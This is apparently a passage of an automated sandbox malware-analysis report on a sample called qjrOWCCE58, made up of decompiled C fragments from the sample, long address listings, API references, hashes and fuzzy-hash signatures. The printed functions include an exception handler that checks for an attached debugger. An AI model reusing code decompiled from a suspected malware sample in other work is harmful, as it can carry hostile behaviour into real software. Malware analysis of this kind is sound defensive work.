				if(_t983 != 0x68) {
					goto L5;
				}
				_t983 = _t988[2] & 0x000000ff;
				if(_t983 != 0x6b) {
					goto L5;
				} else {
					_t984 = 0;
					goto L6;
				}
			}

0x00405841
0x00405849
0x00405850
0x00405856
0x00405858
0x00405863
0x00405864
0x0040586b
0x00405870
0x00405872
0x00405877
0x0040587b
0x00405883
0x00405893
0x00405898
0x0040589e
0x004058a1
0x004058a8
0x004058af
0x004058b5
0x004058db
0x004058e5
0x004058eb
0x0040594d
0x0040595c
0x00405962
0x0040596d
0x00405975
0x00405977
0x00405982
0x00405989
0x0040598e
0x00405991
0x00405998
0x0040599a
0x004059a6
0x004059ad
0x004059ba
0x004059bf
0x004059bf
0x00405998
0x004059c9
0x004059cb
0x004059d2
0x004059d9
0x004059dd
0x004059dd
0x004059f0
0x004059f5
0x004059ff
0x00405a09
0x00405a13
0x00405a1a
0x00405a1a
0x00405a1a
0x00405aca
0x00405ad1
0x00405ae2
0x00405ae2
0x00405ae7
0x00405af1
0x00405afb
0x00405b05
0x00405b0c
0x00405b0c
0x00405b0c
0x00405bcc
0x00405bd3
0x00405bed
0x00405bed
0x00405bf2
0x00405bfc
0x00405c06
0x00405c10
0x00405c17
0x00405c17
0x00405c1a
0x00405c1a
0x00405cc3
0x00405cca
0x00405cfd
0x00405cfd
0x00405d02
0x00405d0c
0x00405d16
0x00405d20
0x00405d27
0x00405d27
0x00405d2a
0x00405d30
0x00405d30
0x00405d32
0x00405d33
0x00405d39
0x00405d45
0x00405d4a
0x00405d54
0x00405d56
0x00405d65
0x00405d6f
0x00405d79
0x00405d80
0x00405d8b
0x00405d92
0x00405d97
0x00405d9b
0x00405da4
0x00405dd5
0x00405dd5
0x00405dd7
0x00405dec
0x00405df6
0x00405e00
0x00405e07
0x00405e12
0x00405e16
0x00405e19
0x00405e1e
0x00405e22
0x00405e2b
0x00405e5c
0x00405e61
0x00405e67
0x00405e6c
0x00405e76
0x00405e7c
0x00405e86
0x00405e90
0x00405e97
0x00405ea1
0x00405eab
0x00405eb5
0x00405ebc
0x00405ec0
0x00405ec5
0x00405ed5
0x00405edc
0x00405ee1
0x00405ee4
0x00405eeb
0x00405ef8
0x00405efd
0x00405f0a
0x00405f0f
0x00405f0f
0x00405eeb
0x00405f12
0x00405f19
0x00405f1b
0x00405f22
0x00405f29
0x00405f32
0x00405f32
0x00405f37
0x00405f3c
0x00405f46
0x00405f50
0x00405f60
0x00405f60
0x00405f62
0x00405f63
0x00405f69
0x00405f6f
0x00405f75
0x00405f7a
0x00405f81
0x00405f82
0x00405f85
0x00405f8a
0x00405f90
0x00405f99
0x00405fd0
0x00405fd2
0x00406497
0x0040649c
0x004064a5
0x004064ac
0x004064b2
0x004064b9
0x004064be
0x004064c1
0x004064c8
0x004064d1
0x004064e2
0x004064e7
0x004064f4
0x004064f9
0x004064f9
0x004064c8
0x004064fc
0x00406501
0x00406503
0x00406505
0x0040650c
0x00406513
0x00406513
0x00406515
0x00406515
0x0040651a
0x0040651f
0x00406529
0x00406533
0x00406540
0x00406540
0x00406542
0x00406543
0x00406543
0x00406549
0x0040654f
0x00406555
0x0040655a
0x00406561
0x00406562
0x00406565
0x0040656a
0x00406570
0x00406576
0x00406579
0x004065aa
0x004065aa
0x004065b1
0x004065b7
0x00406777
0x00406780
0x00406787
0x0040678d
0x00406794
0x00406799
0x0040679c
0x004067a3
0x004067ac
0x004067bd
0x004067c2
0x004067cf
0x004067d4
0x004067d4
0x004067a3
0x004067d7
0x004067dc
0x004067de
0x004067e0
0x004067e7
0x004067ee
0x004067ee
0x004067f0
0x004067f0
0x004067f5
0x004067fa
0x00406804
0x0040680e
0x00406820
0x00406820
0x00406822
0x00406823
0x00406823
0x00406829
0x0040682f
0x00406835
0x0040683a
0x00406841
0x00406842
0x00406845
0x0040684a
0x00406850
0x00406856
0x00406859
0x00406890
0x00406890
0x00406892
0x00406a7b
0x00406a82
0x00406a84
0x00406a8b
0x00406a91
0x00406a91
0x00406a96
0x00406a9d
0x00406a9f
0x00406aa6
0x00406aac
0x00406aac
0x00406abf
0x00406ac7
0x00406ad1
0x00406ae8
0x00406af7
0x00406afc
0x00406aff
0x00406b09
0x00406b13
0x00406b1d
0x00406b27
0x00406b2b
0x00406b30
0x00406b3a
0x00406b44
0x00406b54
0x00406b5b
0x00406b60
0x00406b63
0x00406b6a
0x00406b6c
0x00406b7f
0x00406b87
0x00406b8c
0x00406b99
0x00406b9e
0x00406b9e
0x00406b6a
0x00406ba8
0x00406bbd
0x00406bbd
0x00406bc2
0x00406bcc
0x00406bd6
0x00406be0
0x00406bea
0x00406bf0
0x00406bf0
0x00406bf2
0x00406bf3
0x00406bf9
0x00406c05
0x00406c0a
0x00406c0e
0x00406c13
0x00406c1d
0x00406c27
0x00406c34
0x00406c3b
0x00406c40
0x00406c43
0x00406c4a
0x00406c4c
0x00406c5f
0x00406c67
0x00406c6c
0x00406c79
0x00406c7e
0x00406c7e
0x00406c4a
0x00406c81
0x00406c88
0x00406c8a
0x00406c91
0x00406c98
0x00406c9f
0x00406ca6
0x00406cad
0x00406cb4
0x00406cbb
0x00406cc4
0x00406cc4
0x00406cc9
0x00406cce
0x00406cd8
0x00406ce2
0x00406cec
0x00406cf6
0x00406cf6
0x00406cf8
0x00406cf9
0x00406cff
0x00406d0b
0x00406d10
0x00406d14
0x00406d19
0x00406d26
0x00406d2d
0x00406d32
0x00406d35
0x00406d3c
0x00406d3e
0x00406d50
0x00406d57
0x00406d5c
0x00406d69
0x00406d6e
0x00406d6e
0x00406d3c
0x00406d71
0x00406d78
0x00406d7a
0x00406d83
0x00406d8a
0x00406d8e
0x00406d93
0x00406d93
0x00406d9a
0x00406d9f
0x00406da9
0x00406db3
0x00406dbd
0x00406dc7
0x00406dc7
0x00406dc9
0x00406dca
0x00406dd0
0x00406ddc
0x00406de1
0x00406df8
0x00406e07
0x00406e0c
0x00406e16
0x00406e20
0x00406e2a
0x00406e2d
0x00406e34
0x00406e39
0x00406e41
0x00406e48
0x00406e4f
0x00406e55
0x00406e66
0x00406e74
0x00406e78
0x00406e86
0x00406e91
0x00406ea2
0x00406eb0
0x00406eb4
0x00406ec2
0x00406eca
0x00406edb
0x00406ee0
0x00406ee3
0x00406ee7
0x00406ef0
0x00406f21
0x00406f21
0x00406f2b
0x00406f35
0x00406f3c
0x00406f40
0x00406f49
0x00406f7a
0x00406f7a
0x00406f84
0x00406f8e
0x00406f95
0x00406f99
0x00406fa2
0x00406fd3
0x00406fd3
0x00406fdd
0x00406fe7
0x00406fee
0x00406ff2
0x00406ffb
0x0040702c
0x0040702c
0x00407036
0x00407040
0x00407047
0x0040704b
0x00407054
0x00407085
0x00407085
0x0040708f
0x00407099
0x004070a0
0x004070a4
0x004070ad
0x004070de
0x004070de
0x004070e8
0x004070f2
0x004070f9
0x004070fd
0x00407106
0x00407133
0x00407133
0x00407137
0x00407140
0x00407172
0x0040717f
0x00407185
0x0040718c
0x00407198
0x0040719b
0x004071a0
0x004071a3
0x004071a3
0x004071bb
0x00000000
0x00000000
0x004071cf
0x004071d5
0x004071d8
0x004071de
0x004071e0
0x004071ea
0x004071f0
0x004071f3
0x004071f3
0x004071f5
0x004071f6
0x004071fc
0x00407204
0x00407209
0x00407213
0x0040721c
0x00407222
0x00407228
0x0040722f
0x00407235
0x0040724f
0x0040725c
0x00407262
0x00407278
0x00407278
0x0040727f
0x00000000
0x00000000
0x00407281
0x00407282
0x0040728a
0x004072a0
0x004072a0
0x004072a2
0x004072a7
0x00000000
0x004072a7
0x0040728c
0x0040728f
0x0040729a
0x00407163
0x00407163
0x00407168
0x00407168
0x0040716a
0x0040716f
0x00000000
0x0040716f
0x00000000
0x0040729a
0x00407264
0x00407269
0x0040726f
0x00407271
0x00407271
0x0040726b
0x0040726b
0x0040726b
0x00407276
0x004072bc
0x004072c7
0x004072cc
0x004072cf
0x004072de
0x004072e3
0x004072e7
0x004072fa
0x00407300
0x00407306
0x00407310
0x00407315
0x0040731a
0x0040732a
0x00407335
0x00407337
0x00407342
0x00407346
0x0040734b
0x0040734d
0x00000000
0x00000000
0x00407361
0x0040736c
0x00407371
0x00407374
0x00000000
0x00000000
0x00407376
0x00407379
0x00407387
0x00407390
0x00407397
0x0040739c
0x004073a0
0x004073a6
0x0040750c
0x0040751a
0x0040751f
0x0040752e
0x00407541
0x00407546
0x0040754c
0x00407551
0x00407555
0x0040755a
0x00407560
0x00407560
0x00407565
0x00407571
0x0040757d
0x00407587
0x0040758c
0x00407596
0x004075a1
0x004075ac
0x004075b0
0x004075b7
0x004075c3
0x004075d0
0x004075d2
0x004075d4
0x004075d4
0x004075e9
0x004075ee
0x00407605
0x00407611
0x0040761b
0x00407629
0x0040762d
0x00407645
0x0040764b
0x00407651
0x0040765b
0x00407660
0x00407665
0x00407675
0x00407680
0x00407682
0x0040768d
0x00407691
0x00407696
0x00407698
0x004076a0
0x004076a5
0x004076a8
0x004076bc
0x004076bc
0x004076a8
0x004076cf
0x004076d4
0x004076eb
0x004076f7
0x00407701
0x0040770f
0x00407713
0x0040772b
0x00407737
0x00407741
0x00407746
0x0040774b
0x0040775b
0x00407766
0x00407768
0x00407773
0x00407777
0x0040777c
0x0040777e
0x0040778f
0x00407792
0x004077aa
0x004077c2
0x004077cd
0x004077e7
0x004077e9
0x004077f3
0x004077f8
0x00407801
0x0040780c
0x00407810
0x0040781f
0x00407836
0x0040783c
0x0040784b
0x00407851
0x00407853
0x0040786c
0x00407878
0x00407882
0x00407890
0x00407894
0x004078a0
0x004078ac
0x004078b8
0x004078ce
0x004078d3
0x004078dc
0x004078dc
0x004078e7
0x004078eb
0x004078eb
0x00407792
0x004078f0
0x004078f0
0x004078f5
0x004078f5
0x004078f7
0x004078fe
0x00407900
0x0040790a
0x00407910
0x00407928
0x0040792a
0x00407930
0x00407933
0x00407935
0x0040793b
0x0040793d
0x0040793f
0x00407944
0x0040794b
0x0040794b
0x00407951
0x00407954
0x00407956
0x0040795c
0x00407963
0x00407963
0x00407969
0x0040796c
0x0040797b
0x00407981
0x00407984
0x00000000
0x00000000
0x00000000
0x0040796e
0x0040796e
0x00407971
0x00407973
0x00407973
0x00407986
0x00407986
0x00407988
0x00000000
0x00000000
0x0040798a
0x0040798d
0x004079c1
0x004079cc
0x00000000
0x004079cc
0x0040798d
0x0040798f
0x0040798f
0x0040799a
0x0040799d
0x004079a3
0x004079a9
0x004079af
0x004079af
0x00407506
0x00407506
0x00000000
0x00407506
0x004073ac
0x004073b2
0x00000000
0x00000000
0x004073b8
0x004073bf
0x00000000
0x00000000
0x004073c5
0x004073d0
0x004073d1
0x004073ea
0x004073f0
0x004073f6
0x00407400
0x00407405
0x0040740a
0x0040741a
0x00407427
0x00407432
0x00407436
0x0040743b
0x0040743d
0x00000000
0x00000000
0x0040744e
0x00407450
0x00407456
0x00407459
0x00000000
0x00000000
0x0040746d
0x00407479
0x00407483
0x004074a0
0x004074a1
0x004074a6
0x004074a9
0x004074b8
0x004074d6
0x004074e0
0x004074e5
0x004074e8
0x004074ea
0x004074f1
0x00000000
0x00000000
0x004074f7
0x004074f7
0x004074fd
0x004074fd
0x00000000
0x004073d0
0x0040737b
0x00407380
0x00407380
0x00000000
0x00000000
0x00000000
0x00407276
0x00407237
0x0040723c
0x00407242
0x00407244
0x00407244
0x0040723e
0x0040723e
0x0040723e
0x00407249
0x00000000
0x00000000
0x00000000
0x00000000
0x004072aa
0x004072af
0x004072af
0x00407172
0x00407142
0x00407148
0x00407149
0x00407151
0x00000000
0x00000000
0x00407153
0x00407156
0x0040715e
0x00407161
0x00000000
0x00000000
0x00000000
0x00407161
0x00407108
0x0040710e
0x0040710f
0x00407117
0x00407129
0x00407129
0x0040712b
0x00407130
0x00000000
0x00407130
0x00407119
0x0040711c
0x00407127
0x00000000
0x00000000
0x00000000
0x00407127
0x004070af
0x004070b5
0x004070b6
0x004070be
0x004070d4
0x004070d4
0x004070d6
0x004070db
0x00000000
0x004070db
0x004070c0
0x004070c3
0x004070ce
0x00000000
0x00000000
0x00000000
0x004070ce
0x00407056
0x0040705c
0x0040705d
0x00407065
0x0040707b
0x0040707b
0x0040707d
0x00407082
0x00000000
0x00407082
0x00407067
0x0040706a
0x00407075
0x00000000
0x00000000
0x00000000
0x00407075
0x00406ffd
0x00407003
0x00407004
0x0040700c
0x00407022
0x00407022
0x00407024
0x00407029
0x00000000
0x00407029
0x0040700e
0x00407011
0x0040701c
0x00000000
0x00000000
0x00000000
0x0040701c
0x00406fa4
0x00406faa
0x00406fab
0x00406fb3
0x00406fc9
0x00406fc9
0x00406fcb
0x00406fd0
0x00000000
0x00406fd0
0x00406fb5
0x00406fb8
0x00406fc3
0x00000000
0x00000000
0x00000000
0x00406fc3
0x00406f4b
0x00406f51
0x00406f52
0x00406f5a
0x00406f70
0x00406f70
0x00406f72
0x00406f77
0x00000000
0x00406f77
0x00406f5c
0x00406f5f
0x00406f6a
0x00000000
0x00000000
0x00000000
0x00406f6a
0x00406ef2
0x00406ef8
0x00406ef9
0x00406f01
0x00406f17
0x00406f17
0x00406f19
0x00406f1e
0x00000000
0x00406f1e
0x00406f03
0x00406f06
0x00406f11
0x00000000
0x00000000
0x00000000
0x00406baa
0x00406baa
0x00406bb0
0x00406bb0
0x00406bb7
0x00406bb8
0x00000000
0x00406bb0
0x00406ba8
0x00406898
0x0040689d
0x004068a6
0x004068ac
0x004068b3
0x004068b8
0x004068bb
0x004068c2
0x004068d0
0x004068d6
0x004068e3
0x004068e8
0x004068e8
0x004068c2
0x004068eb
0x004068f0
0x004068f2
0x004068f4
0x004068fb
0x004068fb
0x004068fd
0x004068fd
0x00406902
0x00406907
0x00406911
0x0040691b
0x00406928
0x00406928
0x0040692a
0x0040692b
0x0040692b
0x00406931
0x00406937
0x0040693d
0x00406942
0x00406948
0x0040694b
0x0040697c
0x0040697c
0x00406983
0x00406988
0x00406991
0x00406998
0x0040699f
0x004069a7
0x004069af
0x004069b5
0x004069bc
0x004069c1
0x004069c4
0x004069cb
0x004069d4
0x004069e5
0x004069ea
0x004069f7
0x004069fc
0x004069fc
0x004069cb
0x004069ff
0x00406a04
0x00406a06
0x00406a08
0x00406a0f
0x00406a16
0x00406a16
0x00406a18
0x00406a18
0x00406a1d
0x00406a22
0x00406a2c
0x00406a36
0x00406a43
0x00406a43
0x00406a45
0x00406a46
0x00406a46
0x00406a4a
0x00406a4a
0x00406a4c
0x00406a4d
0x00406a52
0x00406a52
0x00406a58
0x00406a5d
0x00406a64
0x00406a6b
0x00406a73
0x00000000
0x00406a73
0x0040694d
0x00406953
0x00406954
0x00406956
0x0040695c
0x00406972
0x00406972
0x00406974
0x00406979
0x00000000
0x00406979
0x0040695e
0x00406961
0x00406969
0x0040696c
0x00000000
0x00000000
0x00000000
0x0040696c
0x0040685b
0x00406861
0x00406862
0x00406864
0x0040686a
0x00406880
0x00406880
0x00406882
0x00406887
0x0040688d
0x00000000
0x0040688d
0x0040686c
0x0040686f
0x00406877
0x0040687a
0x00000000
0x00000000
0x00000000
0x0040687a
0x004065bd
0x004065c6
0x004065cc
0x004065d3
0x004065d8
0x004065db
0x004065e2
0x004065f0
0x004065f6
0x00406603
0x00406608
0x00406608
0x004065e2
0x0040660b
0x00406610
0x00406612
0x00406614
0x0040661b
0x0040661b
0x0040661d
0x0040661d
0x00406622
0x00406627
0x00406631
0x0040663b
0x00406648
0x00406648
0x0040664a
0x0040664b
0x0040664b
0x00406651
0x00406657
0x0040665d
0x00406662
0x00406668
0x0040666b
0x0040669c
0x0040669c
0x004066a3
0x004066a8
0x004066b1
0x004066b8
0x004066bf
0x004066c7
0x004066cf
0x004066d5
0x004066dc
0x004066e1
0x004066e4
0x004066eb
0x004066f4
0x00406705
0x0040670a
0x00406717
0x0040671c
0x0040671c
0x004066eb
0x0040671f
0x00406724
0x00406726
0x00406728
0x0040672f
0x00406736
0x00406736
0x00406738
0x00406738
0x0040673d
0x00406742
0x0040674c
0x00406756
0x00406763
0x00406763
0x00406765
0x00406766
0x00406766
0x0040676c
0x0040676d
0x00000000
0x0040676d
0x0040666d
0x00406673
0x00406674
0x00406676
0x0040667c
0x00406692
0x00406692
0x00406694
0x00406699
0x00000000
0x00406699
0x0040667e
0x00406681
0x00406689
0x0040668c
0x00000000
0x00000000
0x00000000
0x0040668c
0x0040657b
0x00406581
0x00406582
0x00406584
0x0040658a
0x004065a0
0x004065a0
0x004065a2
0x004065a7
0x00000000
0x004065a7
0x0040658c
0x0040658f
0x00406597
0x0040659a
0x00000000
0x00000000
0x00000000
0x0040659a
0x00405fe2
0x00405fe6
0x00405ff5
0x00405ffa
0x00406000
0x0040627b
0x0040627b
0x00406280
0x0040628a
0x00406293
0x0040629a
0x004062a0
0x004062a7
0x004062ac
0x004062af
0x004062b6
0x004062be
0x004062ca
0x004062db
0x004062e0
0x004062ed
0x004062f2
0x004062f2
0x004062b6
0x004062f5
0x004062fa
0x004062fc
0x004062fe
0x00406305
0x0040630c
0x00406313
0x0040631a
0x00406321
0x00406328
0x00406328
0x0040632a
0x0040632a
0x0040632f
0x00406334
0x0040633e
0x00406348
0x00406355
0x00406355
0x00406357
0x00406358
0x00406358
0x0040635e
0x0040636a
0x0040636f
0x00406376
0x0040637b
0x00406384
0x0040638b
0x00406393
0x0040639b
0x004063a1
0x004063a8
0x004063ad
0x004063b0
0x004063b7
0x004063c5
0x004063cb
0x004063d8
0x004063dd
0x004063dd
0x004063b7
0x004063e0
0x004063e5
0x004063e7
0x004063e9
0x004063f0
0x004063f0
0x004063f2
0x004063f2
0x004063f7
0x004063fc
0x00406406
0x00406410
0x00406420
0x00406420
0x00406422
0x00406423
0x00406423
0x00406429
0x0040642f
0x00406435
0x0040643a
0x00406440
0x00406443
0x00406474
0x00406474
0x0040647b
0x00406482
0x0040648a
0x00000000
0x0040648a
0x00406445
0x0040644b
0x0040644c
0x0040644e
0x00406454
0x0040646a
0x0040646a
0x0040646c
0x00406471
0x00000000
0x00406471
0x00406456
0x00406459
0x00406461
0x00406464
0x00000000
0x00000000
0x00000000
0x00406464
0x00406013
0x0040601f
0x00406024
0x0040602a
0x00000000
0x00000000
0x0040603d
0x00406049
0x0040604e
0x00406054
0x00000000
0x00000000
0x0040605a
0x0040605f
0x00406069
0x00406072
0x0040607f
0x00406086
0x0040608b
0x0040608e
0x00406095
0x0040609d
0x004060a9
0x004060ba
0x004060bf
0x004060cc
0x004060d1
0x004060d1
0x00406095
0x004060d4
0x004060db
0x004060dd
0x004060e4
0x004060eb
0x004060f2
0x004060f9
0x00406100
0x00406109
0x00406109
0x0040610e
0x00406113
0x0040611d
0x00406127
0x00406134
0x00406134
0x00406136
0x00406137
0x0040613d
0x00406149
0x0040614e
0x00406155
0x0040615a
0x00406163
0x0040616a
0x00406172
0x00406180
0x00406187
0x0040618c
0x0040618f
0x00406196
0x004061a4
0x004061aa
0x004061b7
0x004061bc
0x004061bc
0x00406196
0x004061bf
0x004061c6
0x004061c8
0x004061d1
0x004061d1
0x004061d6
0x004061db
0x004061e5
0x004061ef
0x00406200
0x00406200
0x00406202
0x00406203
0x00406209
0x0040620f
0x00406215
0x0040621a
0x00406223
0x00000000
0x00000000
0x00406229
0x0040622f
0x00406230
0x00406238
0x0040624e
0x0040624e
0x00406250
0x00406255
0x0040625c
0x0040625f
0x00406266
0x0040626e
0x00000000
0x0040626e
0x0040623a
0x0040623d
0x00406248
0x00000000
0x00000000
0x00000000
0x00406248
0x00405f9b
0x00405fa1
0x00405fa2
0x00405faa
0x00405fc0
0x00405fc0
0x00405fc2
0x00405fc7
0x00405fcd
0x00000000
0x00405fcd
0x00405fac
0x00405faf
0x00405fba
0x00000000
0x00000000
0x00000000
0x00405fba
0x00405e2d
0x00405e33
0x00405e34
0x00405e3c
0x00405e52
0x00405e52
0x00405e54
0x00405e59
0x00000000
0x00405e59
0x00405e3e
0x00405e41
0x00405e49
0x00405e4c
0x00000000
0x00000000
0x00000000
0x00405e4c
0x00405da6
0x00405dac
0x00405dad
0x00405db5
0x00405dcb
0x00405dcb
0x00405dcd
0x00405dd2
0x00000000
0x00405dd2
0x00405db7
0x00405dba
0x00405dc5
0x00000000
0x00000000
0x00000000
0x00405ccc
0x00405ccc
0x00405cd3
0x00405cd8
0x00405cdf
0x00405ce3
0x00405cea
0x00405cf0
0x00405cf0
0x00405cf7
0x00405cf8
0x00000000
0x00405cf0
0x00405c20
0x00405c20
0x00405c22
0x00405c25
0x00000000
0x00405c27
0x00405c29
0x00405c35
0x00405c3a
0x00405c3e
0x00405c43
0x00405c4d
0x00405c57
0x00405c66
0x00405c6d
0x00405c72
0x00405c75
0x00405c7c
0x00405c7e
0x00405c8c
0x00405c98
0x00405ca0
0x00405ca8
0x00405cae
0x00405cbb
0x00405cc0
0x00405cc0
0x00405c7c
0x00000000
0x00405c66
0x00405bd5
0x00405bd5
0x00405bd7
0x00405be0
0x00405be0
0x00405be7
0x00405be8
0x00000000
0x00405be0
0x00405b10
0x00405b10
0x00405b12
0x00405b15
0x00000000
0x00405b17
0x00405b19
0x00405b25
0x00405b2a
0x00405b2e
0x00405b33
0x00405b3d
0x00405b47
0x00405b51
0x00405b5a
0x00405b67
0x00405b6e
0x00405b73
0x00405b76
0x00405b7d
0x00405b85
0x00405b8d
0x00405b99
0x00405baa
0x00405bb2
0x00405bb7
0x00405bc4
0x00405bc9
0x00405bc9
0x00405b7d
0x00000000
0x00405b67
0x00405ad3
0x00405ad3
0x00405ad5
0x00405ad5
0x00405adc
0x00405add
0x00000000
0x00405ad5
0x00405a20
0x00405a20
0x00405a22
0x00405a25
0x00000000
0x00405a27
0x00405a29
0x00405a35
0x00405a3a
0x00405a3e
0x00405a43
0x00405a4d
0x00405a57
0x00405a61
0x00405a70
0x00405a77
0x00405a7c
0x00405a7f
0x00405a86
0x00405a8e
0x00405a96
0x00405aa7
0x00405aaf
0x00405ab5
0x00405ac2
0x00405ac7
0x00405ac7
0x00405a86
0x00000000
0x00405a70
0x00405a25
0x004058ed
0x004058ef
0x004058f6
0x004058fe
0x00405900
0x0040591e
0x0040591e
0x00405920
0x00405920
0x00000000
0x00405920
0x00405902
0x00405905
0x00405908
0x00000000
0x00000000
0x0040590a
0x0040590d
0x00405910
0x00000000
0x00000000
0x00405912
0x00405915
0x00405918
0x00000000
0x0040591a
0x0040591a
0x00000000
0x0040591a
0x004058f8
0x004058f8
0x004058fa
0x00405923
0x00405923
0x00405925
0x00000000
0x00000000
0x00405927
0x0040592e
0x00405933
0x00405936
0x00405941
0x00405948
0x00000000
0x00405948
0x004058f6
0x004058b7
0x004058bc
0x004058d2
0x004058d2
0x004058d4
0x004058d4
0x004058d7
0x004058d9
0x00000000
0x00000000
0x00000000
0x004058d9
0x004058be
0x004058c4
0x00000000
0x00000000
0x004058c6
0x004058cc
0x00000000
0x004058ce
0x004058ce
0x00000000
0x004058ce

Strings

SUB=, xrefs: 00405D60
L\O\, xrefs: 00405C43

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: L\O\$SUB=
API String ID: 1518329722-142633837
Opcode ID: 64a4c46df8236c0534cb3ad555e819052f39977adf5efa6e18e143002e05d42d
Instruction ID: a5e5c5e6f16d5a998546c3346de991d2c4678231bf22eee46c70908609130850
Opcode Fuzzy Hash: 64a4c46df8236c0534cb3ad555e819052f39977adf5efa6e18e143002e05d42d
Instruction Fuzzy Hash: 57819DB0900794DAEB20DF14CD98BAABBB5FB05304F1441E9D5493B2D2C7B95A88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDE5 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040DDE5(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0040DFDB(_t34);
				 *_t60 = 0x2cc;
				_v632 = E0040F2F0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E0040F2F0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0040DFDB(_t49);
				}
				return _t49;
			}

0x0040dde5
0x0040dde5
0x0040dde5
0x0040ddf9
0x0040ddfb
0x0040ddfe
0x0040ddfe
0x0040de02
0x0040de07
0x0040de1f
0x0040de25
0x0040de2b
0x0040de31
0x0040de37
0x0040de3d
0x0040de43
0x0040de4a
0x0040de51
0x0040de58
0x0040de5f
0x0040de66
0x0040de6d
0x0040de6e
0x0040de77
0x0040de7d
0x0040de80
0x0040de86
0x0040de95
0x0040dea1
0x0040deac
0x0040deb3
0x0040deba
0x0040dec5
0x0040decd
0x0040ded6
0x0040ded8
0x0040dedb
0x0040dedd
0x0040dee7
0x0040deef
0x0040def5
0x00000000
0x0040defc
0x0040deff

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040DDF1
IsDebuggerPresent.KERNEL32 ref: 0040DEBD
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040DEDD
UnhandledExceptionFilter.KERNEL32(?), ref: 0040DEE7

Memory Dump Source

Source File: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 15e19ffcfcf4a7f8c1b874926d1dd89c9e956c71c621fb63c6027c0b69297540
Instruction ID: 990c126b229881e318ced55bc54edffeb6839f712adf52da8fc1aea0d722390c
Opcode Fuzzy Hash: 15e19ffcfcf4a7f8c1b874926d1dd89c9e956c71c621fb63c6027c0b69297540
Instruction Fuzzy Hash: 63314B75D0121C9BDF20DFA5D9897CDBBB8BF08304F1040EAE409AB290EB755A898F49

Uniqueness

Uniqueness Score: -1.00%

Function 0082E04C Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0082E058
IsDebuggerPresent.KERNEL32 ref: 0082E124
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082E144
UnhandledExceptionFilter.KERNEL32(?), ref: 0082E14E

Memory Dump Source

Source File: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_qjrOWCCE58.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 15e19ffcfcf4a7f8c1b874926d1dd89c9e956c71c621fb63c6027c0b69297540
Instruction ID: e0bd817c604713f851e21f8b64fe7e77e15d59cc24840b0b01fc47f3048b3c7c
Opcode Fuzzy Hash: 15e19ffcfcf4a7f8c1b874926d1dd89c9e956c71c621fb63c6027c0b69297540
Instruction Fuzzy Hash: BA311A75D0522C9BDB21DFA5D98ABCDBBB8FF08304F1041AAE40DAB250EB715A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00425982 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00425982(void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				signed int _t78;
				intOrPtr _t80;
				signed int _t81;
				void* _t89;
				signed int _t90;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t141;

				_t121 = __edx;
